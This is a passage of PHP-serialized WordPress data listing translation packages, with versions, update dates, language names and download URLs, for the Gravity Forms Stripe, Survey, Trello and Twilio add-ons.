(Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:28:20+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2023-01-06T17:27:44+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2022-07-15T19:38:48+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"4.3.1\";s:7:\"updated\";s:25:\"2022-06-29T16:36:23+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformsstripe/gravityformsstripe-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:18:\"gravityformssurvey\";a:1:{s:12:\"translations\";a:25:{s:2:\"bg\";a:7:{s:8:\"language\";s:5:\"bg_BG\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2023-04-14T18:14:00+00:00\";s:12:\"english_name\";s:9:\"Bulgarian\";s:11:\"native_name\";s:18:\"Български\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-bg_BG.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"bg\";i:1;s:3:\"bul\";}}s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2022-06-27T10:14:22+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:5:\"zh-cn\";a:7:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2022-06-23T19:14:15+00:00\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-zh_CN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:5:\"zh-hk\";a:7:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2023-03-02T20:58:13+00:00\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:16:\"香港中文版	\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-zh_HK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"zh\";i:1;s:3:\"zho\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2022-06-23T19:13:23+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2020-11-06T13:19:33+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2022-06-27T08:34:13+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2022-03-15T13:30:45+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2022-06-23T19:13:41+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:5:\"fr-ca\";a:7:{s:8:\"language\";s:5:\"fr_CA\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2023-03-02T20:57:55+00:00\";s:12:\"english_name\";s:15:\"French (Canada)\";s:11:\"native_name\";s:19:\"Français du Canada\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-fr_CA.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fr\";i:1;s:3:\"fra\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2020-10-21T11:49:45+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2020-11-06T13:18:23+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2020-11-06T13:17:26+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2023-02-20T14:38:29+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"hu\";a:7:{s:8:\"language\";s:5:\"hu_HU\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2023-03-02T20:57:59+00:00\";s:12:\"english_name\";s:9:\"Hungarian\";s:11:\"native_name\";s:6:\"Magyar\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-hu_HU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hu\";i:1;s:3:\"hun\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2020-11-06T13:16:42+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2020-11-06T13:18:45+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2023-03-02T20:58:03+00:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2021-09-14T10:15:27+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2020-12-17T14:59:21+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2020-12-17T15:04:46+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2020-11-06T13:18:00+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2020-11-06T13:19:05+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2022-07-16T20:11:56+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"3.8\";s:7:\"updated\";s:25:\"2020-11-05T09:28:06+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformssurvey/gravityformssurvey-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:18:\"gravityformstrello\";a:1:{s:12:\"translations\";a:19:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-02-20T14:31:16+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:29:40+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:30:23+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T08:34:13+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-03-15T13:30:45+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:29:56+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:30:00+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:29:45+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:30:03+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:30:06+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:30:12+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-03-14T17:57:49+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:30:25+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:30:28+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:30:30+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:30:34+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:29:53+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2021-09-29T17:59:48+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2021-09-16T16:50:37+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstrello/gravityformstrello-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:18:\"gravityformstwilio\";a:1:{s:12:\"translations\";a:18:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2022-06-23T19:13:23+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2020-11-06T13:29:03+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2023-01-05T16:46:39+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2022-06-27T09:02:55+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:31:07+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2020-10-21T13:19:12+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:30:55+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:31:12+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2020-11-06T13:26:40+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2020-11-06T13:26:20+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2023-03-14T17:58:48+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:96:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:31:31+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:99:\"https://packages.translationspress.com/rocketgenius/gravityformstwilio/gravityformstwilio-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"2.9.1\";s:7:\"updated\";s:25:\"2023-01-06T17:31:33+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do 